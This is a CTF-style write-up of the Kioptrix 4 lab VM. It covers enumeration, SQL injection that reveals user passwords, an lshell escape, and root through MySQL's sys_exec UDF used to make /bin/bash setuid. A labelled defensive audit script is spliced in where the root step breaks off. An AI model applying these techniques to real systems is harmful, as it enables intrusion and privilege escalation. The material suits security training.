Kioptrix 4 Write-Up
To prepare for OSCP I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK course.
Kioptrix 4
The Kioptrix series consists of several beginner boot2root VMs, each with multiple ways to gain a root shell.
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 4.
Scanning & Enumeration
After finding the IP of the Kioptrix VM, the usual Nmap scan gives a quick overview of what is running on it:
root@vm-kali:~# nmap -T4 -sV 172.16.45.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-09-04 18:35 MDT
Nmap scan report for 172.16.45.136
Host is up (0.00013s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BE:BD:DA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.98 seconds
Additionally, enum4linux or rpcclient can be used over a null session to find more information such as usernames or software version numbers. Sadly, the resulting information did not get me anywhere interesting, except for providing a short list of usernames.
root@vm-kali:~# rpcclient -U "" 172.16.45.136
Enter 's password:
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
rpcclient $> netshareenum
rpcclient $> netshareenumall
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
netname: IPC$
remark: IPC Service (Kioptrix4 server (Samba, Ubuntu))
path: C:\tmp
password:
rpcclient $>
root@vm-kali:~/Documents/vulnhub# enum4linux 172.16.45.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 4 18:47:02 2017
--snip--
=======================================
| OS information on 172.16.45.136 |
=======================================
[+] Got OS info for 172.16.45.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 172.16.45.136 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
==============================
| Users on 172.16.45.136 |
==============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
==========================================
| Share Enumeration on 172.16.45.136 |
==========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
--snip--
enum4linux complete on Mon Sep 4 18:47:27 2017
Web Vulnerabilities
On the website it’s possible to perform some file inclusions and SQL injections that appear to work but didn’t seem to lead anywhere. After a bit of thinking I ran dirbuster, and finally used the usernames found earlier in combination with the SQL injection, which led to the passwords of a couple of users.
The dirbuster results:
root@vm-kali:~# dirb http://172.16.45.136
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 4 19:04:08 2017
URL_BASE: http://172.16.45.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.45.136/ ----
+ http://172.16.45.136/cgi-bin/ (CODE:403|SIZE:328)
==> DIRECTORY: http://172.16.45.136/images/
+ http://172.16.45.136/index (CODE:200|SIZE:1255)
+ http://172.16.45.136/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://172.16.45.136/john/
+ http://172.16.45.136/logout (CODE:302|SIZE:0)
+ http://172.16.45.136/member (CODE:302|SIZE:220)
+ http://172.16.45.136/server-status (CODE:403|SIZE:333)
---- Entering directory: http://172.16.45.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.45.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Sep 4 19:04:10 2017
DOWNLOADED: 4612 - FOUND: 6
Results from the SQL injections when using the actual usernames:
http://172.16.45.136/member.php?username=john
Username : john
Password : MyNameIsJohn
Logged out, logged back in with SQLi and user robert:
http://172.16.45.136/member.php?username=robert
Username : robert
Password : ADGAdsafdfwt4gadfga==
Basic Shell
Looking back at the Nmap scan, we know that there is an SSH server running, and it appears that we can use the found credentials to log in! The downside was that it gave a restricted shell:
john:~$ ? help
Limited Shell (lshell) limited help.
Cheers.
With some quick Google searches you can figure out that lshell is written in Python and can be escaped quite easily:
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
Privilege Escalation
Now with a normal shell, one of the first things to do is test whether GCC is installed. It is not, which means the privilege escalation will most likely not involve compiling an exploit on the box.
john@Kioptrix4:~$ gcc
The program 'gcc' can be found in the following packages:
* gcc
* pentium-builder
Ask your administrator to install one of them
bash: gcc: command not found
So what else… Maybe there are services that run as root and can be abused to gain better privileges?
john@Kioptrix4:~$ ps aux | grep root
--snip--
root 4732 0.0 0.0 1872 540 ? S 14:26 0:00 /bin/dd bs=1 if=/proc/kmsg of=/var/run/klogd/kmsg
root 4753 0.0 0.0 5316 988 ? Ss 14:26 0:00 /usr/sbin/sshd
root 4809 0.0 0.0 1772 528 ? S 14:26 0:00 /bin/sh /usr/bin/mysqld_safe
root 4851 0.0 1.5 127120 16516 ? Sl 14:26 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-fi
root 4853 0.0 0.0 1700 556 ? S 14:26 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 4926 0.0 0.1 6532 1344 ? Ss 14:26 0:00 /usr/sbin/nmbd -D
root 4928 0.0 0.2 10108 2544 ? Ss 14:26 0:00 /usr/sbin/smbd -D
root 4939 0.0 0.0 10108 1028 ? S 14:26 0:00 /usr/sbin/smbd -D
root 4943 0.0 0.1 8084 1340 ? Ss 14:26 0:00 /usr/sbin/winbindd
root 4945 0.0 0.1 8208 1700 ? S 14:26 0:00 /usr/sbin/winbindd
root 4975 0.0 0.0 2104 888 ? Ss 14:26 0:00 /usr/sbin/cron
root 4997 0.0 0.5 20464 6188 ? Ss 14:26 0:00 /usr/sbin/apache2 -k start
root 5053 0.0 0.0 1716 488 tty1 Ss+ 14:27 0:00 /sbin/getty 38400 tty1
root 5079 0.0 0.0 8084 872 ? S 14:42 0:00 /usr/sbin/winbindd
root 5080 0.0 0.1 8092 1268 ? S 14:42 0:00 /usr/sbin/winbindd
root 5742 0.0 0.3 11360 3720 ? Ss 18:26 0:00 sshd: john [priv]
john 6535 0.0 0.0 3004 752 pts/0 R+ 21:51 0:00 grep root
Wait, is MySQL running as root? That might have some potential. It took me a bit of time to figure out what I had to do; what finally helped me was an article about a special MySQL library (lib_mysqludf_sys). Initially I figured this wouldn’t work, as it’s not possible to compile the library on the box, but I was in luck: the library is already on the system.
john@Kioptrix4:~$ locate mysqludf
/usr/lib/lib_mysqludf_sys.so
mysql> set @status := sys_exec('echo "hello im root" > /tmp/helloworld');
Query OK, 0 rows affected (0.00 sec)
mysql> select @status
-> ;
+---------+
| @status |
+---------+
| NULL |
+---------+
1 row in set (0.00 sec)
mysql> !\ bash
ERROR:
Unknown command '\ '.
-> \! bash
john@Kioptrix4:~$ ls /tmp
helloworld
john@Kioptrix4:~$ cat /tmp/helloworld
cat: /tmp/helloworld: Permission denied
john@Kioptrix4:~$ ls -al /tmp/
total 16
drwxrwxrwt 3 root root 4096 2017-09-04 22:26 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-rw---- 1 root root 14 2017-09-04 22:26 helloworld
The following can be done to get root. It’s not the cleanest way, but it did work.
mysql> set @status := sys_exec('chmod g+s /bin/bash');
Query OK, 0 rows affected (0.00 sec)
mysql> set @status := sys_exec('chmod u+s /bin/bash');
Query OK, 0 rows affected (0.00 sec)
mysql> \! bash
bash-3.2$ id
uid=1001(john) gid=1001(john) groups=1001(john)
bash-3.2$ ls -al /bin/bash
-rwsrwsrwx 1 root root 702160 2008-05-12 14:33 /bin/bash
bash-3.2$ /bin/bash -p
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) egid=0(root) groups=1001(john)
bash-3.2# cat /tmp/
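As an added defender-side example (not from the original write-up): the two conditions that made this escalation possible, mysqld running as root and a setuid/setgid root shell, are both cheap to audit. The script below parses constructed `ps aux` and `ls -l` samples in the formats shown above; the ROOT_FORBIDDEN and SETID_BASELINE sets are assumptions to be adjusted per host.

```python
# Added example, not code from the write-up: audit checks for mysqld running
# as uid 0 and for setuid/setgid binaries missing from a baseline. Input is
# constructed text in the ps aux / ls -l formats shown in the write-up so it
# runs offline; on a live host, feed in the real command output instead.

# mysqld should run as its service user. sshd, cron, smbd and the apache2
# parent legitimately run as root (they drop privileges in workers).
ROOT_FORBIDDEN = {"mysqld"}

# Assumed baseline of expected setuid binaries; build yours from a known-good host.
SETID_BASELINE = {"/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}

PS_SAMPLE = """\
root 4851 0.0 1.5 127120 16516 ? Sl 14:26 0:02 /usr/sbin/mysqld --basedir=/usr --user=root
mysql 4852 0.0 1.5 127120 16516 ? Sl 14:26 0:02 /usr/sbin/mysqld --user=mysql
john 6535 0.0 0.0 3004 752 pts/0 R+ 21:51 0:00 grep root
"""

LS_SAMPLE = """\
-rwsrwsrwx 1 root root 702160 2008-05-12 14:33 /bin/bash
-rwsr-xr-x 1 root root 31056 2008-05-12 14:33 /bin/su
"""

def root_services(ps_output):
    """(pid, binary) for every ROOT_FORBIDDEN service whose USER column is root."""
    hits = []
    for line in ps_output.splitlines():
        fields = line.split(None, 10)       # ps aux: 10 fixed columns, then COMMAND
        if len(fields) < 11 or fields[0] != "root":
            continue
        binary = fields[10].split()[0].rsplit("/", 1)[-1]
        if binary in ROOT_FORBIDDEN:
            hits.append((int(fields[1]), binary))
    return hits

def unexpected_setid(ls_output):
    """(path, flags) for setuid/setgid regular files not in SETID_BASELINE."""
    findings = []
    for line in ls_output.splitlines():
        fields = line.split()
        if len(fields) < 8 or not fields[0].startswith("-"):
            continue                        # skip directories, links, "total" lines
        mode, path = fields[0], fields[-1]
        flags = [name for pos, name in ((3, "setuid"), (6, "setgid")) if mode[pos] in "sS"]
        if flags and mode[8] == "w":        # setuid plus world-writable, as on this box
            flags.append("world-writable")
        if flags and path not in SETID_BASELINE:
            findings.append((path, tuple(flags)))
    return findings

if __name__ == "__main__":
    print(root_services(PS_SAMPLE), unexpected_setid(LS_SAMPLE))
```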
Additional Notes / Lessons Learned
All in all I really enjoyed the VM, mainly because the different VMs show different ways to find information and exploit vulnerabilities. Especially the variety of ways to achieve privilege escalation is interesting to play around with.